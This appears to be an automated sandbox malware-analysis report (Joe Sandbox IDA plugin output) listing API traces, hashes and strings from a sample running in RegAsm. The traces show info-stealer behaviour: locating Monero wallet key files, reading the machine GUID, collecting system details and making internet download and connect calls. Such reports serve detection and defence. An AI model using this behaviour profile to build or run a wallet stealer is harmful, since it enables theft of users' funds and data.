                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00401E3F
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                                                                                                                                                                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                              • API String ID: 1518627966-218353709
                                                                                                                                                                                                                                                              • Opcode ID: 846c5179dac43e1cc9e1acf48b7cd4aaa31981977699ce3e04ea74058f54095e
                                                                                                                                                                                                                                                              • Instruction ID: 77cbf698dbc2ebeb1d93bf6e0acc2ad49f70a310cf74dac5adb55abea99cd855
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846c5179dac43e1cc9e1acf48b7cd4aaa31981977699ce3e04ea74058f54095e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02515271D00248EACB04EBE5D846BDDBB78AF18308F54446EF905B31D2DB785719CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00404D97
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DE6
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00404E00
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E24
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E45
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404E6C
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404E90
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EAA
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404EB1
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404EBA
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2737972104-0
                                                                                                                                                                                                                                                              • Opcode ID: a25d67a3a2f3fdfeaba9d8df5627200e159ff2d5a2b49d18510ea29a32385fb9
                                                                                                                                                                                                                                                              • Instruction ID: 9992f2a2cb445bd017637bb275931e072b683fe6351a7a81dedcbf61475a23e3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a25d67a3a2f3fdfeaba9d8df5627200e159ff2d5a2b49d18510ea29a32385fb9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C4138B2900209ABDB10EFE1DD85EEE7B7DFF44704F10443AFA11B2191D7385A458BA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040D2BF
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D300
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D375
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D491
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 0040CA5F: _EH_prolog.MSVCRT ref: 0040CA64
                                                                                                                                                                                                                                                                • Part of subcall function 0040A810: _EH_prolog.MSVCRT ref: 0040A815
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000), ref: 0040D547
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000), ref: 0040D5BB
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy
                                                                                                                                                                                                                                                              • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                              • API String ID: 2120869262-4033978473
                                                                                                                                                                                                                                                              • Opcode ID: 0d37dc93a3ab44cf1acd9cd16f14fc52873d997c91e71b002d2caaf26f4d2e09
                                                                                                                                                                                                                                                              • Instruction ID: 528cf13577b2f7f329050b7ccef95fe7cac87747c3dc2e9dd2ec3b92d3dc2083
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d37dc93a3ab44cf1acd9cd16f14fc52873d997c91e71b002d2caaf26f4d2e09
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD15271D00248AACF10EBBAD9467DDBFB4AF19304F50846EF84577282DB785718CBA6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040EF1F
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NDB,?,?,00000000), ref: 0040EF3B
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(NDB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040EF5A
                                                                                                                                                                                                                                                              • CharToOemA.USER32(?,?), ref: 0040EF77
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                                                                              • String ID: MachineGuid$NDB$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                              • API String ID: 1728412123-443910793
                                                                                                                                                                                                                                                              • Opcode ID: 13e4882eb1125f27dd797c198b71fdf7c31a4107cfe51514bc4cf764ddd0f3a6
                                                                                                                                                                                                                                                              • Instruction ID: c7b45006bd05bcce8b765a7edbe6677ca4963fc08e8d1b136df89886e47375eb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13e4882eb1125f27dd797c198b71fdf7c31a4107cfe51514bc4cf764ddd0f3a6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E012C7594021DFFDB10DBA0EC89EEAB77CEB14748F1000A1B145A2052EBB49E998B60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040613D
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061C3
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3869837436-0
                                                                                                                                                                                                                                                              • Opcode ID: 14799fd20c6eaaff4fd43e91c765d24a78c4929a0e36d0399129c3326377c819
                                                                                                                                                                                                                                                              • Instruction ID: 4eef68157ad315862bfd7591b0fce14e4dd7968f7242f7c704032396ebb2caca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14799fd20c6eaaff4fd43e91c765d24a78c4929a0e36d0399129c3326377c819
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26219F31A00104AFDB209FA5DC89AAF7BB9FF44760F10092AF912F62D1D7349955CB64
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040EA15
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040EA1C
                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0040EA3C
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0040EA62
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                              • String ID: %d MB$@
                                                                                                                                                                                                                                                              • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                              • Opcode ID: 0d6f02759f3faad2c4d5b1dc494c944bc3e773da87faed9fee065f8d8b5c4296
                                                                                                                                                                                                                                                              • Instruction ID: 34444111109be8d414b5ba55085423e125bbd5c149e3b0f9e886c25067a5b7a5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d6f02759f3faad2c4d5b1dc494c944bc3e773da87faed9fee065f8d8b5c4296
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CF05BB1700204ABE7149BB5DC4AF7E76BDE744705F400529F606E72C0D774DC158769
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004152AF
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 00411F49: _EH_prolog.MSVCRT ref: 00411F4E
                                                                                                                                                                                                                                                                • Part of subcall function 00411FF8: _EH_prolog.MSVCRT ref: 00411FFD
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32(74DD0000,004153D3), ref: 004160A3
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004160BA
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004160D1
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004160E8
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004160FF
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416116
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041612D
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416144
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041615B
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416172
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416189
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161A0
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161B7
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161CE
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161E5
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161FC
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416213
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041622A
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416241
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416258
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041626F
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416286
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041629D
                                                                                                                                                                                                                                                                • Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004162B4
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412358: _EH_prolog.MSVCRT ref: 0041235D
                                                                                                                                                                                                                                                                • Part of subcall function 00411CE1: _EH_prolog.MSVCRT ref: 00411CE6
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004154DB
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004154F7
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: _EH_prolog.MSVCRT ref: 0040EFC6
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040EFE9
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F01B
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F05E
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F065
                                                                                                                                                                                                                                                                • Part of subcall function 00403AA8: _EH_prolog.MSVCRT ref: 00403AAD
                                                                                                                                                                                                                                                                • Part of subcall function 00403AA8: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403B58
                                                                                                                                                                                                                                                                • Part of subcall function 00403AA8: StrCmpCA.SHLWAPI(?), ref: 00403B6F
                                                                                                                                                                                                                                                                • Part of subcall function 0041068E: _EH_prolog.MSVCRT ref: 00410693
                                                                                                                                                                                                                                                                • Part of subcall function 0041068E: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00415572), ref: 004106B5
                                                                                                                                                                                                                                                                • Part of subcall function 0041068E: ExitProcess.KERNEL32 ref: 004106C0
                                                                                                                                                                                                                                                                • Part of subcall function 00405114: _EH_prolog.MSVCRT ref: 00405119
                                                                                                                                                                                                                                                                • Part of subcall function 00405114: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051C4
                                                                                                                                                                                                                                                                • Part of subcall function 00405114: StrCmpCA.SHLWAPI(?), ref: 004051DB
                                                                                                                                                                                                                                                                • Part of subcall function 0041017A: _EH_prolog.MSVCRT ref: 0041017F
                                                                                                                                                                                                                                                                • Part of subcall function 0041017A: strtok_s.MSVCRT ref: 004101A6
                                                                                                                                                                                                                                                                • Part of subcall function 0041017A: StrCmpCA.SHLWAPI(00000000,00424468,?,?,?,?,00415701), ref: 004101D7
                                                                                                                                                                                                                                                                • Part of subcall function 0041017A: strtok_s.MSVCRT ref: 00410238
                                                                                                                                                                                                                                                                • Part of subcall function 00401E78: _EH_prolog.MSVCRT ref: 00401E7D
                                                                                                                                                                                                                                                                • Part of subcall function 00405114: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405363
